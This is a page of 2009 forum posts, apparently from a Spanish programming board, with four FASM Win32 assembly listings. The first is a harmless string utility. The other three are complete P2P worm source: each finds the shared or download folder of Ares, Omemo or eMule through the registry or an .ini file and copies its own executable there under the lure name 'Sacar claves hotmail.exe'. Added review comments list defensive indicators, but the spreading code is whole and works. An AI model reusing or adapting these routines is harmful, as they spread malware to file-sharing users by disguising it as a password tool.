|
411
|
Programación / ASM / Re: Recopilación de mis codigos.
|
en: 21 Junio 2009, 08:33 am
|
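; Syntax: FASM (flat assembler), Win32, stdcall, 32-bit x86.
; Demo program: shows the last 9 characters of dString in a message box.
include 'win32ax.inc'

.data
        dString db "i'm a string",0

.code
start:
        stdcall fRight,dString,9
        test    eax,eax                 ; fRight returns 0 when the allocation failed
        jz      .quit
        invoke  MessageBox,0,eax,0,0
.quit:
        invoke  ExitProcess,0           ; fixed: the original line ended in a stray "'" (unterminated string)

;-----------------------------------------------------------------------
; fRight(pString, pLen) - emulates the Right() function of Visual Basic 6
; ABI:   stdcall (win32ax 'proc' macro)
; In:    pString = pointer to a NUL-terminated byte string
;        pLen    = number of trailing characters wanted
; Out:   eax = pointer to a new GlobalAlloc(GPTR) buffer holding the last
;              min(pLen, Len(pString)) characters, NUL-terminated,
;              or 0 if the allocation failed.
;        The caller owns the buffer (release it with GlobalFree).
; Saves: esi, ebx, edi, ecx
;-----------------------------------------------------------------------
proc fRight,pString,pLen
        push    esi ebx edi ecx

        stdcall Len,[pString]           ; eax = length of the source string
        cmp     eax,[pLen]
        jae     .len_ok
        mov     [pLen],eax              ; clamp: the original read before the start of the
                                        ; string whenever pLen exceeded its length
.len_ok:
        mov     edi,[pString]
        add     edi,eax
        sub     edi,[pLen]              ; edi -> first character of the requested tail

        mov     eax,[pLen]
        inc     eax                     ; one extra byte for the terminator
        invoke  GlobalAlloc,GPTR,eax    ; GPTR zero-fills, so the terminator is already in place
        mov     esi,eax                 ; esi = result pointer (kept for the return value)
        test    eax,eax
        jz      .exit                   ; allocation failed: return 0 instead of writing through NULL
        mov     ebx,eax                 ; ebx = write cursor

.bucle_:
        cmp     [pLen],0                ; pLen = characters still to copy
        je      .exit
        mov     cl,byte[edi]
        mov     byte[ebx],cl
        inc     ebx
        inc     edi
        dec     [pLen]
        jmp     .bucle_

.exit:
        mov     eax,esi
        pop     ecx edi ebx esi
        ret
endp

;-----------------------------------------------------------------------
; Len(cCadena) - measures a NUL-terminated byte string
; In:    cCadena = pointer to the string
; Out:   eax = length in bytes, terminator not counted
; Saves: ecx, edi
;-----------------------------------------------------------------------
proc Len,cCadena
        push    ecx edi
        mov     ecx,-1                  ; scan with no length limit
        mov     edi,[cCadena]
        mov     al,0
        repnz   scasb                   ; stops just past the terminator
        mov     eax,ecx
        not     eax                     ; not(ecx) = bytes scanned, terminator included
        dec     eax                     ; drop the terminator from the count
        pop     edi ecx
        ret
endp

.end start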
|
|
|
412
|
Programación / ASM / Re: Recopilación de mis codigos.
|
en: 20 Junio 2009, 02:35 am
|
; Syntax: FASM, Win32, stdcall, 32-bit x86.
; NOTE(review): self-copying sample. It reads a folder path from the registry
; key HKCU\Software\Ares (value "Download.Folder") and copies its own
; executable into that folder under the fixed name in cName.
; Defensive indicators visible in this listing: a process that is not the P2P
; client reading that registry value, followed by CopyFile of the process's own
; image into the folder; an .exe with the cName filename appearing there.
include 'win32ax.inc'
entry start
.code
cName equ "Sacar claves hotmail.exe" ; Name under which the program copies itself

; Entry point: build "<folder>\<cName>" in lBuffer2, get the own image path in
; lBuffer3, copy one to the other, then exit.
proc start
        locals
                lBuffer rb MAX_PATH     ; raw registry value
                lBuffer2 rb MAX_PATH    ; decoded folder path, later the destination path
                lBuffer3 rb MAX_PATH    ; own image path converted to single bytes
        endl
        stdcall Zerar,addr lBuffer,MAX_PATH
        stdcall LeerRegistro,HKEY_CURRENT_USER,"Software\Ares" , "Download.Folder",addr lBuffer
        .if eax = 0                     ; key or value missing: nothing to do
                jmp .exit
        .endif
        stdcall Zerar,addr lBuffer2,MAX_PATH
        invoke lstrlen,addr lBuffer
        ; the value is treated as hex text and decoded into bytes
        stdcall HexToString,addr lBuffer,eax,addr lBuffer2
        invoke lstrlen,addr lBuffer2
        lea ebx,[lBuffer2]
        mov byte[ebx+eax],"\"           ; replace the terminator with a path separator
        ; zero the rest of lBuffer2 after the separator
        mov ebx,MAX_PATH
        sub ebx,eax
        lea edx,[lBuffer2]
        inc eax
        add eax,edx
        stdcall Zerar,eax,ebx
        invoke lstrcat, addr lBuffer2,cName
        ; On 32-bit Windows FS:[30h] is the PEB; +10h is the process-parameters
        ; pointer and +3Ch in that structure is the buffer of the image path
        ; (a UTF-16 string), i.e. the path of the running executable.
        MOV EaX, [FS:30h]
        MOV EaX, [EaX + 10h]
        MOV EaX, [EaX + 3Ch]
        stdcall Zerar,addr lBuffer3,MAX_PATH
        stdcall UniToAscii, addr lBuffer3,eax
        ; third argument 0 = bFailIfExists FALSE: an existing file is overwritten
        invoke CopyFile, addr lBuffer3, addr lBuffer2,0
        .exit:
        invoke ExitProcess,0
endp

; UniToAscii(ascii, unicode): copies the non-zero bytes of the source to the
; destination, skipping single zero bytes, and stops at two consecutive zero
; bytes. Returns edi (the write cursor) + 2 in eax. No output bound is checked.
proc UniToAscii, ascii, unicode
        push esi
        push edi
        mov esi, [unicode]
        mov edi, [ascii]
        .count:
        .if byte[esi] <> 0
                movsb
                jmp .count
        .endif
        inc esi                         ; skip one zero byte
        .if byte[esi] = 0               ; a second zero byte ends the string
                jmp .exit
        .endif
        jmp .count
        .exit:
        mov eax, edi
        add eax, 2
        pop edi
        pop esi
        ret
endp

; Zerar(Puntero, Cantidad): fills a memory area with zeros.
; The loop clears offsets Cantidad down to 1, then offset 0 is cleared
; separately, so Cantidad+1 bytes are written. Saves ecx and ebx.
proc Zerar,Puntero,Cantidad ; Function that fills a location with zeros
        push ecx
        push ebx
        mov ecx,[Cantidad]
        mov ebx,[Puntero]
        .bucle:
        mov byte[ebx+ecx],0
        loop .bucle
        mov byte[ebx],0
        pop ebx
        pop ecx
        ret
endp

; LeerRegistro(cHKEY, cCadena, cCampo, cBuffer): opens cHKEY\cCadena for
; reading and queries value cCampo into cBuffer.
; Returns eax = 1 on success, 0 if either call fails. ebx is overwritten.
; The size passed to RegQueryValueEx is MAX_PATH*3, not the size of the
; caller's buffer; no RegCloseKey call appears in this listing.
proc LeerRegistro,cHKEY,cCadena,cCampo,cBuffer
        locals
                temp dd ?               ; in/out byte count for RegQueryValueEx
                Result dd ?             ; opened key handle
        endl
        mov [temp],MAX_PATH*3
        invoke RegOpenKeyEx,[cHKEY],[cCadena],0,KEY_READ, addr Result
        .if eax <> 0 ; If there is no data, return 0
                xor eax,eax
                jmp .salir
        .endif
        lea ebx,[temp]
        invoke RegQueryValueEx ,[Result],[cCampo],0,0,[cBuffer],ebx
        .if eax <> 0 ; If there is no data, return 0
                xor eax,eax
                jmp .salir
        .endif
        mov eax,1
        .salir:
        ret
endp

; HexToString(cPuntero, cCantidad, cBuffer): decodes pairs of hex characters
; at cPuntero into bytes at cBuffer. cCantidad is decremented once per byte
; written (twice for the "C3" case). All registers are kept (pushad/popad).
proc HexToString,cPuntero,cCantidad,cBuffer
        pushad
        mov edi,[cPuntero]
        mov esi,[cBuffer]
        .bucle:
        cmp [cCantidad] ,0
        je .salir
        ; high nibble: character code mod 16, plus 9 for characters >= 'A'
        movzx eax,byte[edi]
        xor edx,edx
        mov ebx,16
        div ebx
        mov ecx,edx
        .if byte[edi] >= 'A'
                add ecx,9
        .endif
        xor edx,edx
        mov eax,16
        mul ecx                         ; shift the nibble into the high half
        mov ecx,eax
        ; special case: the text "C3"/"c3" consumes four characters and is
        ; written as the single byte "ó"
        ; NOTE(review): presumably a UTF-8 lead byte C3 plus its continuation - confirm
        .if word[edi] = "C3" | word[edi]= "c3"
                mov byte[esi],"ó"
                add edi,4
                inc esi
                sub [cCantidad],2
                jmp .bucle
        .endif
        ; low nibble, same decoding
        movzx eax,byte[edi+1]
        xor edx,edx
        mov ebx,16
        div ebx
        .if byte[edi+1] >= 'A'
                add edx,9
        .endif
        add ecx,edx
        mov byte[esi],cl
        inc esi
        add edi,2
        dec [cCantidad]
        jmp .bucle
        .salir :
        popad
        ret
endp

; Import table
section '.idata' import data readable
        library shlwapi,'shlwapi.dll',kernel32,'kernel32.dll' ,advapi32,'advapi32.dll',user32,'user32.dll'
        include 'api/kernel32.inc'
        include 'api/advapi32.inc'
        import shlwapi,PathFileExists,'PathFileExistsA'
        include 'api/user32.inc'
|
|
|
413
|
Programación / ASM / Re: Recopilación de mis codigos.
|
en: 20 Junio 2009, 02:18 am
|
; Syntax: FASM, Win32, stdcall, 32-bit x86.
; NOTE(review): self-copying sample. It locates Omemo.ini through the registry
; key HKLM\SOFTWARE\Omemo (value "InstallDir"), reads the "SAVE_AS_FOLDER"
; setting from it, and copies its own executable into that folder under the
; fixed name in cName.
; Defensive indicators visible in this listing: a process other than the P2P
; client reading that key and .ini file, followed by CopyFile of the process's
; own image into the configured folder; an .exe with the cName filename there.
include 'win32ax.inc'
entry start
.code
cName equ "Sacar claves hotmail.exe" ; Name under which the program copies itself

; Entry point: build "<SAVE_AS_FOLDER>\<cName>" in lBuffer2, get the own image
; path in lBuffer3, copy one to the other, then exit.
proc start
        locals
                lBuffer rb MAX_PATH     ; install dir, then path of Omemo.ini
                lBuffer2 rb MAX_PATH    ; target folder, later the destination path
                lBuffer3 rb MAX_PATH    ; own image path converted to single bytes
        endl
        stdcall Zerar,addr lBuffer,MAX_PATH
        stdcall LeerRegistro,HKEY_LOCAL_MACHINE,"SOFTWARE\Omemo" , "InstallDir",addr lBuffer
        .if eax = 0                     ; key or value missing: nothing to do
                jmp .exit
        .endif
        invoke lstrcat,addr lBuffer,"\Omemo.ini"
        invoke PathFileExists,addr lBuffer
        .if eax <> 0
                stdcall Zerar,addr lBuffer2,MAX_PATH
                ; read [global] SAVE_AS_FOLDER from the .ini (no default, 260-byte buffer)
                invoke GetPrivateProfileString,"global", "SAVE_AS_FOLDER", 0, addr lBuffer2, 260, addr lBuffer
                invoke lstrlen,addr lBuffer2
                lea ebx,[lBuffer2]
                mov byte[ebx+eax],"\"   ; replace the terminator with a path separator
                invoke lstrcat, addr lBuffer2,cName
                ; On 32-bit Windows FS:[30h] is the PEB; +10h is the
                ; process-parameters pointer and +3Ch in that structure is the
                ; buffer of the image path (a UTF-16 string), i.e. the path of
                ; the running executable.
                MOV EaX, [FS:30h]
                MOV EaX, [EaX + 10h]
                MOV EaX, [EaX + 3Ch]
                stdcall Zerar,addr lBuffer3,MAX_PATH
                stdcall UniToAscii, addr lBuffer3,eax
                ; third argument 0 = bFailIfExists FALSE: an existing file is overwritten
                invoke CopyFile, addr lBuffer3, addr lBuffer2,0
                jmp .exit
        .else
                jmp .exit
        .endif
        .exit:
        invoke ExitProcess,0
endp

; UniToAscii(ascii, unicode): copies the non-zero bytes of the source to the
; destination, skipping single zero bytes, and stops at two consecutive zero
; bytes. Returns edi (the write cursor) + 2 in eax. No output bound is checked.
proc UniToAscii, ascii, unicode
        push esi
        push edi
        mov esi, [unicode]
        mov edi, [ascii]
        .count:
        .if byte[esi] <> 0
                movsb
                jmp .count
        .endif
        inc esi                         ; skip one zero byte
        .if byte[esi] = 0               ; a second zero byte ends the string
                jmp .exit
        .endif
        jmp .count
        .exit:
        mov eax, edi
        add eax, 2
        pop edi
        pop esi
        ret
endp

; Zerar(Puntero, Cantidad): fills a memory area with zeros.
; The loop clears offsets Cantidad down to 1, then offset 0 is cleared
; separately, so Cantidad+1 bytes are written. Saves ecx and ebx.
proc Zerar,Puntero,Cantidad ; Function that fills a location with zeros
        push ecx
        push ebx
        mov ecx,[Cantidad]
        mov ebx,[Puntero]
        .bucle:
        mov byte[ebx+ecx],0
        loop .bucle
        mov byte[ebx],0
        pop ebx
        pop ecx
        ret
endp

; LeerRegistro(cHKEY, cCadena, cCampo, cBuffer): opens cHKEY\cCadena for
; reading and queries value cCampo into cBuffer.
; Returns eax = 1 on success, 0 if either call fails. ebx is overwritten.
; The size passed to RegQueryValueEx is MAX_PATH*3, not the size of the
; caller's buffer; no RegCloseKey call appears in this listing.
proc LeerRegistro,cHKEY,cCadena,cCampo,cBuffer
        locals
                temp dd ?               ; in/out byte count for RegQueryValueEx
                Result dd ?             ; opened key handle
        endl
        mov [temp],MAX_PATH*3
        invoke RegOpenKeyEx,[cHKEY],[cCadena],0,KEY_READ, addr Result
        .if eax <> 0 ; If there is no data, return 0
                xor eax,eax
                jmp .salir
        .endif
        lea ebx,[temp]
        invoke RegQueryValueEx ,[Result],[cCampo],0,0,[cBuffer],ebx
        .if eax <> 0 ; If there is no data, return 0
                xor eax,eax
                jmp .salir
        .endif
        mov eax,1
        .salir:
        ret
endp

; Import table
section '.idata' import data readable
        library shlwapi,'shlwapi.dll',kernel32,'kernel32.dll' ,advapi32,'advapi32.dll',user32,'user32.dll'
        include 'api/kernel32.inc'
        include 'api/advapi32.inc'
        include 'api/user32.inc'
        import shlwapi,PathFileExists,'PathFileExistsA'
|
|
|
414
|
Programación / ASM / Re: Recopilación de mis codigos.
|
en: 19 Junio 2009, 22:12 pm
|
; Syntax: FASM, Win32, stdcall, 32-bit x86.
; NOTE(review): self-copying sample. It locates config\preferences.ini through
; the registry key HKCU\Software\eMule (value "Install Path"), reads the
; "IncomingDir" setting from it, and copies its own executable into that
; folder under the fixed name in cName.
; Defensive indicators visible in this listing: a process other than the P2P
; client reading that key and .ini file, followed by CopyFile of the process's
; own image into the configured folder; an .exe with the cName filename there.
include 'win32ax.inc'
entry start
.code
cName equ "Sacar claves hotmail.exe" ; Name under which the program copies itself

; Entry point: build "<IncomingDir>\<cName>" in lBuffer2, get the own image
; path in lBuffer3, copy one to the other, then exit.
proc start
        locals
                lBuffer rb MAX_PATH     ; install path, then path of preferences.ini
                lBuffer2 rb MAX_PATH    ; target folder, later the destination path
                lBuffer3 rb MAX_PATH    ; own image path converted to single bytes
        endl
        stdcall Zerar,addr lBuffer,MAX_PATH
        stdcall LeerRegistro,HKEY_CURRENT_USER,"Software\eMule" , "Install Path",addr lBuffer
        .if eax = 0                     ; key or value missing: nothing to do
                jmp .exit
        .endif
        invoke lstrcat,addr lBuffer,"\config\preferences.ini"
        invoke PathFileExists,addr lBuffer
        .if eax <> 0
                stdcall Zerar,addr lBuffer2,MAX_PATH
                ; read [eMule] IncomingDir from the .ini (no default, 260-byte buffer)
                invoke GetPrivateProfileString,"eMule", "IncomingDir", 0, addr lBuffer2, 260, addr lBuffer
                invoke lstrlen,addr lBuffer2
                lea ebx,[lBuffer2]
                mov byte[ebx+eax],"\"   ; replace the terminator with a path separator
                invoke lstrcat, addr lBuffer2,cName
                ; On 32-bit Windows FS:[30h] is the PEB; +10h is the
                ; process-parameters pointer and +3Ch in that structure is the
                ; buffer of the image path (a UTF-16 string), i.e. the path of
                ; the running executable.
                MOV EaX, [FS:30h]
                MOV EaX, [EaX + 10h]
                MOV EaX, [EaX + 3Ch]
                stdcall Zerar,addr lBuffer3,MAX_PATH
                stdcall UniToAscii, addr lBuffer3,eax
                ; third argument 0 = bFailIfExists FALSE: an existing file is overwritten
                invoke CopyFile, addr lBuffer3, addr lBuffer2,0
                jmp .exit
        .else
                jmp .exit
        .endif
        .exit:
        invoke ExitProcess,0
endp

; UniToAscii(ascii, unicode): copies the non-zero bytes of the source to the
; destination, skipping single zero bytes, and stops at two consecutive zero
; bytes. Returns edi (the write cursor) + 2 in eax. No output bound is checked.
proc UniToAscii, ascii, unicode
        push esi
        push edi
        mov esi, [unicode]
        mov edi, [ascii]
        .count:
        .if byte[esi] <> 0
                movsb
                jmp .count
        .endif
        inc esi                         ; skip one zero byte
        .if byte[esi] = 0               ; a second zero byte ends the string
                jmp .exit
        .endif
        jmp .count
        .exit:
        mov eax, edi
        add eax, 2
        pop edi
        pop esi
        ret
endp

; Zerar(Puntero, Cantidad): fills a memory area with zeros.
; The loop clears offsets Cantidad down to 1, then offset 0 is cleared
; separately, so Cantidad+1 bytes are written. Saves ecx and ebx.
proc Zerar,Puntero,Cantidad ; Function that fills a location with zeros
        push ecx
        push ebx
        mov ecx,[Cantidad]
        mov ebx,[Puntero]
        .bucle:
        mov byte[ebx+ecx],0
        loop .bucle
        mov byte[ebx],0
        pop ebx
        pop ecx
        ret
endp

; LeerRegistro(cHKEY, cCadena, cCampo, cBuffer): opens cHKEY\cCadena for
; reading and queries value cCampo into cBuffer.
; Returns eax = TRUE on success, 0 if either call fails. ebx is overwritten.
; The size passed to RegQueryValueEx is MAX_PATH*3, not the size of the
; caller's buffer; no RegCloseKey call appears in this listing.
proc LeerRegistro,cHKEY,cCadena,cCampo,cBuffer
        locals
                temp dd ?               ; in/out byte count for RegQueryValueEx
                Result dd ?             ; opened key handle
        endl
        mov [temp],MAX_PATH*3
        invoke RegOpenKeyEx,[cHKEY],[cCadena],0,KEY_READ, addr Result
        .if eax <> 0 ; If there is no data, return 0
                xor eax,eax
                jmp .salir
        .endif
        lea ebx,[temp]
        invoke RegQueryValueEx ,[Result],[cCampo],0,0,[cBuffer],ebx
        .if eax <> 0 ; If there is no data, return 0
                xor eax,eax
                jmp .salir
        .endif
        mov eax,TRUE
        .salir:
        ret
endp

; Import table
section '.idata' import data readable
        library shlwapi,'shlwapi.dll',kernel32,'kernel32.dll' ,advapi32,'advapi32.dll'
        include 'api/kernel32.inc'
        include 'api/advapi32.inc'
        import shlwapi,PathFileExists,'PathFileExistsA'
|
|
|
|
|
|
|